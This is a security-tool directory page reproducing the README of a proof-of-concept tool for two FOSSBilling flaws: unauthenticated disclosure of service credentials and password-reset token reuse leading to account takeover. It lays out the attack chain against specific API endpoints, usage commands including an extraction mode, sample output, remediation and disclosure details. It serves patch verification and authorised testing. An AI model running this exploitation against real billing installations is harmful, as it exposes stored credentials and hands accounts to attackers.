Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
FOSKiller — FOSSBilling CVE-2026-53647 & CVE-2026-53646 PoC — Unauthenticated API key disclosure & password reset token reuse | Kitploit
Tools/GitHubGitHub/7megaumka7/foskiller
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationAPI Security TestingPenetration Testing
GitHub7megaumka7/foskiller

FOSKiller

FOSSBilling CVE-2026-53647 & CVE-2026-53646 PoC — Unauthenticated API key disclosure & password reset token reuse

View Repository
1123 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
root@kitploit:~
 ███████╗ ██████╗ ███████╗██╗  ██╗██╗██╗     ██╗     ███████╗██████╗
 ██╔════╝██╔═══██╗██╔════╝██║ ██╔╝██║██║     ██║     ██╔════╝██╔══██╗
 █████╗  ██║   ██║███████╗█████╔╝ ██║██║     ██║     █████╗  ██████╔╝
 ██╔══╝  ██║   ██║╚════██║██╔═██╗ ██║██║     ██║     ██╔══╝  ██╔══██╗
 ██║     ╚██████╔╝███████║██║  ██╗██║███████╗███████╗███████╗██║  ██║
 ╚═╝      ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝  ╚═╝

made by 7megaumka7

PoC tool for two accepted GitHub Security Advisory vulnerabilities in FOSSBilling ≤ 0.7.2

Python License CVE-2026-53647 CVE-2026-53646


Table of Contents

  • Introduction
  • Vulnerabilities
    • CVE-2026-53647 — Unauthenticated API Key Config Disclosure
    • CVE-2026-53646 — Password Reset Token Reuse
  • Requirements
  • Installation
  • Usage
    • Flags
    • Modes
    • Examples
  • Sample Output
  • Remediation
  • Responsible Disclosure
  • Legal Disclaimer
  • Credits

Introduction

FOSKiller is a proof-of-concept tool demonstrating two security vulnerabilities in FOSSBilling — an open-source billing and client management platform. Both vulnerabilities were responsibly disclosed through the GitHub Security Advisory program and are fully patched in FOSSBilling 0.7.3+.

The tool is intended for:

  • Security researchers verifying their own FOSSBilling installations
  • Penetration testers conducting authorized engagements
  • Defenders confirming patch application

Vulnerabilities

CVE-2026-53647 — Unauthenticated API Key Config Disclosure

The guest endpoint /api/guest/serviceapikey/get_info returns the full service configuration — including custom_* fields, API credentials, hostnames, and passwords — without requiring any authentication. An attacker who knows or enumerates a valid API key can retrieve complete backend service configuration from a public endpoint.

Impact: Exposure of service credentials, internal hostnames, API secrets.

CVE-2026-53646 — Password Reset Token Reuse

When a client triggers two consecutive password resets for the same account, the application issues a new token but does not invalidate the previous one. An attacker who previously captured the first token can use it to set a new password even after the legitimate user completes their own reset flow.

Attack chain:

root@kitploit:~
1. Attacker triggers POST /api/guest/client/reset_password → captures token T1
2. Victim triggers their own reset → app issues T2, T1 remains valid
3. Attacker calls POST /api/guest/client/update_password?hash=T1 with chosen password
4. Attacker has persistent access regardless of victim's reset completion

Impact: Persistent account takeover of any client whose reset email is interceptable.


Requirements

  • Python 3.8+
  • requests
  • colorama

If dependencies are missing, the script detects this on startup and offers to install them automatically.


Installation

Clone and install dependencies:

root@kitploit:~
git clone https://github.com/7megaumka7/FOSKiller.git
cd FOSKiller
pip install -r requirements.txt

Or run without pre-installing — the script will prompt to install missing packages on first run.


Usage

root@kitploit:~
python fossbilling_poc.py --target URL [--key KEY] [--email EMAIL]
                          [--check-only | --exploit]
                          [--force] [--output FILE]
                          [--timeout SEC] [--proxy URL]

Flags

--check-only and --exploit are mutually exclusive.

Modes

Examples

Detection only — verify both CVEs without extracting data:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --email [email protected] \
  --check-only

Full extraction and attack chain documentation:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --email [email protected] \
  --exploit

Save results to JSON and route through Burp Suite:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --email [email protected] \
  --output results.json \
  --proxy http://127.0.0.1:8080

Test an unknown or already-patched version:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --force

Sample Output

root@kitploit:~
[*] Probing https://billing.example.com …
[+] Detected version: 0.7.1
[+] CVE-2026-53647 affected range (>=0.5.3 <=0.7.2): YES
[+] CVE-2026-53646 affected range (>=0.5.6 <=0.7.2): YES

── CVE-2026-53647 │ Unauthenticated API Key Config Disclosure ─────────
[*] Target  : https://billing.example.com/api/guest/serviceapikey/get_info?key=***
[*] Mode    : Full extraction
[*] HTTP    : 200
[+] VULNERABLE — endpoint returned 4 sensitive field(s) without authentication

  Field                          Value
  ──────────────────────────────────────────────────────────────────────
  custom_hostname                db.internal.example.com
  custom_username                fossbilling_db
  custom_password                [REDACTED IN THIS EXAMPLE]
  custom_api_secret              [REDACTED IN THIS EXAMPLE]

── CVE-2026-53646 │ Password Reset Token Reuse / Account Takeover ─────
[*] Sending reset request #1 …
[*]   HTTP 200  |  142 ms  |  2026-06-12T10:00:00.000Z
[*] Sending reset request #2 (same email) …
[*]   HTTP 200  |  138 ms  |  2026-06-12T10:00:01.000Z
[*]   Time delta between requests : 0.643s
[!] Both reset requests succeeded — endpoint accepts repeated resets without rate-limiting.

── Summary ─────────────────────────────────────────────────────────────

  CVE                  GHSA                         Severity               Status
  ──────────────────────────────────────────────────────────────────────────────────
  CVE-2026-53647       GHSA-737q-9gpr-6mpq          Moderate (CVSS 6.9)    VULNERABLE
  CVE-2026-53646       GHSA-vp66-w6rc-x32p          High (CVSS 7.7)        POTENTIALLY_VULNERABLE

Remediation

Upgrade to FOSSBilling >= 0.7.3, which addresses both vulnerabilities.

If immediate patching is not possible:

CVEInterim Mitigation
CVE-2026-53647Block access to /api/guest/serviceapikey/ at the web server or WAF level
CVE-2026-53646Implement token invalidation on re-issue; add rate-limiting to the reset endpoint

Responsible Disclosure

Both vulnerabilities were reported to the FOSSBilling maintainers through the GitHub Security Advisory program prior to this publication.

  • Advisory 1: https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-737q-9gpr-6mpq
  • Advisory 2: https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-vp66-w6rc-x32p

Legal Disclaimer

This tool is provided for educational purposes and authorized security testing only.

Only use this tool against systems you own or have received explicit written permission to test. Unauthorized use against third-party systems is illegal under the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act, and equivalent legislation worldwide.

The author assumes no responsibility for misuse, damage, or legal consequences arising from the use of this tool. By using this tool you agree that you are solely responsible for your actions.


Credits

Researcher & Author: 7megaumka7

Vulnerability discovery, analysis, responsible disclosure, and tool development.

Download Tool
AdvisoryCVETypeCVSSAffected
GHSA-737q-9gpr-6mpqCVE-2026-53647Unauthenticated API Key Config Disclosure6.9 Moderate>= 0.5.3, <= 0.7.2
GHSA-vp66-w6rc-x32pCVE-2026-53646Password Reset Token Reuse → Account Takeover7.7 High>= 0.5.6, <= 0.7.2
FlagRequiredDescription
--target URLYesBase URL of the FOSSBilling instance
--key KEYFor CVE-2026-53647API key to test
--email EMAILFor CVE-2026-53646Client email to test
--check-onlyNoDetection mode — confirm vulnerability without extracting data
--exploitNoFull extraction + attack chain documentation
--forceNoSkip version range check
--output FILENoSave full results to a JSON file
--timeout SECNoHTTP timeout in seconds (default: 10)
--proxy URLNoHTTP proxy (e.g. http://127.0.0.1:8080)
ModeFlagWhat it does
Detection--check-onlyConfirms the vulnerability exists. Does not display or extract sensitive values.
Default(no mode flag)Confirms status and shows basic evidence.
Exploitation--exploitExtracts all leaked fields; documents full account-takeover chain with timing metadata.